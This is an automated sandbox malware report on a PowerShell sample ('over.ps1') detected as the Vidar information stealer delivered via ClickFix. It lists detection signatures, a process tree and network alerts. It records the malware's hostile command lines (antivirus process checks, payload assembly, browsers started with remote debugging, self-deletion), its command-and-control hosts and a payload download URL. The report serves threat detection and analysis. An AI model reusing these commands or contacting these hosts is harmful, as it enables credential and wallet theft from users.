Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
over.ps1

Overview

General Information

Sample name:over.ps1
Analysis ID:1582851
MD5:657bc0b7650e5a675cd7b293766fbdb5
SHA1:7c2cebd51bf266b5c577f96d99c2611c1e33314f
SHA256:3855e15e8ccc5defba674ad44fe84618524e61516502a4bd7ccaaf6b209642bb
Tags:ClickFixps1user-aachum
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Monitors registry run keys for changes
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 4956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 1560 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 6152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES27E7.tmp" "c:\Users\user\AppData\Local\Temp\l2xn2zg1\CSC17118CCF1564C5291822499255B405E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • hyf04rot.rhn.exe (PID: 576 cmdline: "C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe" MD5: 39798D9BFF4607F95DF260FF89C564C0)
      • cmd.exe (PID: 3788 cmdline: "C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6156 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6396 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 6668 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6552 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 3816 cmdline: cmd /c md 164676 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 2684 cmdline: extrac32 /Y /E Grab MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 6204 cmdline: findstr /V "slovenia" Contractors MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 572 cmdline: cmd /c copy /b 164676\Stopped.com + Zero + Refugees + Severe + Removal + Differential + Mph + Increasingly + Born + Convinced + Passenger 164676\Stopped.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 2656 cmdline: cmd /c copy /b ..\Furnished + ..\Relative + ..\Calgary + ..\Pour + ..\Halfcom + ..\Nj + ..\Capitol + ..\Firewire + ..\Trees h MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Stopped.com (PID: 904 cmdline: Stopped.com h MD5: 62D09F076E6E0240548C2F837536A46A)
          • chrome.exe (PID: 572 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 5332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2316,i,2421533482498937402,17485656150599773384,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • msedge.exe (PID: 7584 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 7828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2612,i,12049331983733306251,11913654916641555052,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7272 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 4984 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=2524,i,1638855310437427533,11522752701638102957,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • cmd.exe (PID: 7072 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com" & rd /s /q "C:\ProgramData\dj5xt" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 6536 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • choice.exe (PID: 7064 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • svchost.exe (PID: 4120 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7812 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8140 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2016,i,7658775566138034046,42518589343975993,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 3524 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5136 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7940 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6928 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7928 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Browser Started with Remote Debugging
    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Stopped.com h, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com, ParentProcessId: 904, ParentProcessName: Stopped.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 572, ProcessName: chrome.exe
    Sigma detected: Change PowerShell Policies to an Insecure Level
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1", ProcessId: 4956, ProcessName: powershell.exe
    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4956, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline", ProcessId: 1560, ProcessName: csc.exe
    Sigma detected: Dynamic CSharp Compile Artefact
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4956, TargetFilename: C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1", ProcessId: 4956, ProcessName: powershell.exe
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4120, ProcessName: svchost.exe

    Data Obfuscation

    barindex
    Sigma detected: Dot net compiler compiles file from suspicious location
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4956, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline", ProcessId: 1560, ProcessName: csc.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Sigma detected: Search for Antivirus process
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3788, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6552, ProcessName: findstr.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T16:58:17.866675+010020583451Exploit Kit Activity Detected192.168.2.5639701.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T16:58:18.496151+010020583461Exploit Kit Activity Detected192.168.2.549706185.121.235.167443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T16:58:49.014417+010020442471Malware Command and Control Activity Detected116.203.14.4443192.168.2.549832TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T16:58:50.373263+010020518311Malware Command and Control Activity Detected116.203.14.4443192.168.2.549841TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T16:58:47.707413+010020490871A Network Trojan was detected192.168.2.549823116.203.14.4443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T16:58:46.376793+010028593781Malware Command and Control Activity Detected192.168.2.549812116.203.14.4443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T16:58:11.182815+010018100032Potentially Bad Traffic185.199.109.133443192.168.2.549704TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-31T16:58:11.182679+010018100001Potentially Bad Traffic192.168.2.549704185.199.109.133443TCP
    2024-12-31T16:58:17.403241+010018100001Potentially Bad Traffic192.168.2.54970534.160.111.145443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://saaadnesss.shop/connectAvira URL Cloud: Label: malware
    Source: http://saaadnesss.shopAvira URL Cloud: Label: malware
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeReversingLabs: Detection: 24%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
    Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49946 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.121.235.167:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49796 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.5:49804 version: TLS 1.2
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.pdbhP source: powershell.exe, 00000000.00000002.2133357506.00000241021C0000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.pdb source: powershell.exe, 00000000.00000002.2133357506.00000241021C0000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_004062D5 FindFirstFileW,FindClose,5_2_004062D5
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_00402E18 FindFirstFileW,5_2_00402E18
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406C9B
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
    Source: chrome.exeMemory has grown: Private usage: 0MB later: 39MB

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2058345 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (saaadnesss .shop) : 192.168.2.5:63970 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2058346 - Severity 1 - ET EXPLOIT_KIT ClickFix Domain in TLS SNI (saaadnesss .shop) : 192.168.2.5:49706 -> 185.121.235.167:443
    Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49705 -> 34.160.111.145:443
    Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 185.199.109.133:443
    Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49812 -> 116.203.14.4:443
    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49823 -> 116.203.14.4:443
    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.14.4:443 -> 192.168.2.5:49832
    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.14.4:443 -> 192.168.2.5:49841
    Source: global trafficTCP traffic: 192.168.2.5:64411 -> 1.1.1.1:53
    Source: global trafficHTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
    Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
    Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
    Source: Joe Sandbox ViewASN Name: IPCORE-ASES IPCORE-ASES
    Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.109.133:443 -> 192.168.2.5:49704
    Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49946 version: TLS 1.0
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.225
    Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.175
    Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.175
    Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.175
    Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.175
    Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.175
    Source: global trafficHTTP traffic detected: GET /rk2026/civil/refs/heads/main/MatAugust.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ifconfig.meConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: sdoout.lolConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
